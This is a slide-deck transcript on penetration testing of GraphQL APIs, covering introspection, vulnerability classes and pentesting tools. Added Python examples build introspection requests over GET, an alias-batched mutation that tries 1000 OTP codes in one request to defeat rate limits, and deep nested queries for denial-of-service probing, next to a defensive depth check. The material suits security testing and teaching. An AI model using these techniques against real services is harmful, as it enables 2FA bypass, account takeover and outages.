Pentesting GraphQL APIs
Arun
July 17, 2020
Technology
Transcript
graphql {
  GraphQL
  GraphQL Architecture
  REST Vs GraphQL
  GraphQL Schema
  Introspection Query
  GraphQL Vulnerabilities
  Pentesting Tools
  GraphQL in Action !!!
}
Ref: https://bit.ly/3hLZNO7
Ref: https://bit.ly/3fBQSNk
GraphQL Schema
• Query (type) - READ: for retrieving data/results, similar to GET in REST.
• Mutation (type) - WRITE: for modifications, like POST/PUT/DELETE operations.
• Subscription (type) - EVENTS: for events/realtime updates.
Change the POST request into a GET request and append the payload from the links below to the endpoint URL:
https://pastebin.com/QyNaXVKg
https://pastebin.com/dFdsTaDQ
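The introspection step above, as an added example that is not part of the deck: it builds a minimal introspection document, shows how to move it from the POST body into the URL query string for a GET request, and enumerates the object types, fields and arguments from the response, flagging names a tester would look at first. The endpoint URL and the response it parses are constructed for this example; no request is sent.

```python
# Added example (not from the deck): introspection over GET and schema enumeration.
# Assumptions: the endpoint accepts ?query=... on GET as the slide describes, and it
# returns the standard __schema JSON. SAMPLE_RESPONSE is constructed; nothing is sent.
from urllib.parse import urlencode

# Minimal introspection document: enough to list root types, object fields and args.
INTROSPECTION_QUERY = """
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    subscriptionType { name }
    types {
      kind
      name
      fields(includeDeprecated: true) {
        name
        args { name type { kind name ofType { kind name } } }
        type { kind name ofType { kind name } }
      }
    }
  }
}
"""

# Field names worth a closer look in any schema a tester enumerates.
SENSITIVE = ("admin", "password", "token", "secret", "delete", "reset", "debug")


def introspection_get_url(endpoint: str) -> str:
    """Move the query from the POST body into the URL, i.e. the GET variant from the slide."""
    return endpoint + "?" + urlencode({"query": INTROSPECTION_QUERY})


def type_name(t: dict) -> str:
    """Render a type reference (String!, [User], ID) from the kind/name/ofType chain."""
    if t is None:
        return "?"
    kind = t.get("kind")
    if kind == "NON_NULL":
        return type_name(t.get("ofType")) + "!"
    if kind == "LIST":
        return "[" + type_name(t.get("ofType")) + "]"
    return t.get("name") or "?"


def enumerate_schema(response: dict) -> dict:
    """Map each user-defined OBJECT type to 'field(args): Type' lines; skip __ built-ins."""
    out = {}
    for t in response["data"]["__schema"]["types"]:
        if t["kind"] != "OBJECT" or t["name"].startswith("__"):
            continue
        lines = []
        for f in t.get("fields") or []:
            args = ", ".join(f"{a['name']}: {type_name(a['type'])}" for a in f.get("args") or [])
            head = f"{f['name']}({args})" if args else f["name"]
            lines.append(f"{head}: {type_name(f['type'])}")
        out[t["name"]] = lines
    return out


def flag_sensitive(sigs_by_type: dict) -> list:
    """Return 'Type.field...' entries whose name hints at privileged or auth-related data."""
    return [f"{tname}.{sig}" for tname, sigs in sigs_by_type.items()
            for sig in sigs if any(k in sig.lower() for k in SENSITIVE)]


# Constructed response, shaped like a real __schema answer but trimmed to a few types.
SAMPLE_RESPONSE = {"data": {"__schema": {
    "queryType": {"name": "Query"}, "mutationType": {"name": "Mutation"}, "subscriptionType": None,
    "types": [
        {"kind": "OBJECT", "name": "Query", "fields": [
            {"name": "user",
             "args": [{"name": "id", "type": {"kind": "NON_NULL", "name": None,
                                              "ofType": {"kind": "SCALAR", "name": "ID"}}}],
             "type": {"kind": "OBJECT", "name": "User", "ofType": None}},
            {"name": "users", "args": [],
             "type": {"kind": "LIST", "name": None, "ofType": {"kind": "OBJECT", "name": "User"}}}]},
        {"kind": "OBJECT", "name": "Mutation", "fields": [
            {"name": "resetPassword",
             "args": [{"name": "token", "type": {"kind": "SCALAR", "name": "String", "ofType": None}}],
             "type": {"kind": "SCALAR", "name": "Boolean", "ofType": None}}]},
        {"kind": "OBJECT", "name": "User", "fields": [
            {"name": "id", "args": [], "type": {"kind": "SCALAR", "name": "ID", "ofType": None}},
            {"name": "isAdmin", "args": [], "type": {"kind": "SCALAR", "name": "Boolean", "ofType": None}}]},
        {"kind": "OBJECT", "name": "__Schema", "fields": []},
        {"kind": "SCALAR", "name": "String", "fields": None},
    ]}}}


if __name__ == "__main__":
    print(introspection_get_url("https://example.test/graphql")[:80] + "...")
    sigs = enumerate_schema(SAMPLE_RESPONSE)
    for tname, lines in sigs.items():
        print(tname, lines)
    print("flagged:", flag_sensitive(sigs))
```

If the endpoint answers introspection over GET, record it: a server that also executes mutations over GET, with the query in the URL, can be driven from a cross-site link or image tag because the browser attaches the victim's cookies. The `__schema` response also lists every field the server knows about, including ones the front end never calls, which is where the flagged names usually come from.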
GraphQL Vulnerabilities
• SQL Injection
• NoSQL Injection
• Access Control Related Issues
• Mass Assignment
• IDOR
• Bypassing 2FA / BruteForce Attacks
• DOS Attacks
etc.
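Two of the items in the list above, as an added example that is not part of the deck: the first part packs many OTP candidates into one request using aliases (the 2FA bypass / brute-force item, where a rate limit counted per HTTP request never sees more than one request), the second generates nested queries and measures their depth (the DoS item, and the check a depth limiter makes). The `verifyOtp` mutation, its arguments, the `friends` field and the parsed response are assumed or constructed, not taken from the deck.

```python
# Added example (not from the deck): two GraphQL-specific primitives behind the
# "Bypassing 2FA/BruteForce" and "DOS" items. The mutation verifyOtp, its arguments,
# the field `friends` and the parsed response are all assumed/constructed.
import json


def build_alias_batch(codes, mutation="verifyOtp", arg="code", user_id="1001") -> str:
    """One document, one HTTP request, N mutations: aliases a0..aN keep the results apart.
    A per-request rate limit on the OTP check sees a single request."""
    parts = [f'  a{i}: {mutation}(userId: "{user_id}", {arg}: "{c}") {{ ok }}'
             for i, c in enumerate(codes)]
    return "mutation {\n" + "\n".join(parts) + "\n}"


def request_body(document: str) -> str:
    """The JSON body a client POSTs; the same document string goes into ?query= for GET."""
    return json.dumps({"query": document})


def find_successful_alias(response: dict) -> list:
    """Aliases whose result reports ok: true, from a parsed JSON response."""
    data = response.get("data") or {}
    return [alias for alias, val in data.items()
            if isinstance(val, dict) and val.get("ok") is True]


def nested_query(levels: int, field: str = "friends") -> str:
    """The recursive query used to probe depth limits: me { friends { friends { ... id } } }."""
    body = "id"
    for _ in range(levels):
        body = f"{field} {{ {body} }}"
    return f"query {{ me {{ {body} }} }}"


def query_depth(document: str) -> int:
    """Max nesting of selection sets. Braces inside string literals are ignored so a
    value like name(s: "{x}") is not miscounted; this is the check a depth limiter makes."""
    depth = cur = 0
    in_str = False
    i = 0
    while i < len(document):
        ch = document[i]
        if in_str:
            if ch == "\\":
                i += 1          # skip the escaped character
            elif ch == '"':
                in_str = False
        elif ch == '"':
            in_str = True
        elif ch == "{":
            cur += 1
            depth = max(depth, cur)
        elif ch == "}":
            cur -= 1
        i += 1
    return depth


def exceeds_depth_limit(document: str, limit: int) -> bool:
    """Defensive side: reject a document deeper than the configured limit before executing it."""
    return query_depth(document) > limit


if __name__ == "__main__":
    batch = build_alias_batch([f"{n:06d}" for n in range(0, 1000)])   # 1000 guesses, one request
    print(request_body(batch)[:120] + "...")
    # Constructed response: the server answered every alias, only a1 matched.
    print("hit:", find_successful_alias({"data": {"a0": {"ok": False}, "a1": {"ok": True}}}))
    deep = nested_query(25)
    print("depth", query_depth(deep), "blocked" if exceeds_depth_limit(deep, 10) else "allowed")
```

Aliasing works for any query or mutation, so the same batch document doubles as a test of whether rate limiting is applied per operation or per HTTP request. For the depth probe, compare status and response time of `nested_query(5)` against `nested_query(50)`: a server with no depth or complexity limit resolves every level, and a limiter that rejects the deep document should do so before any resolver runs.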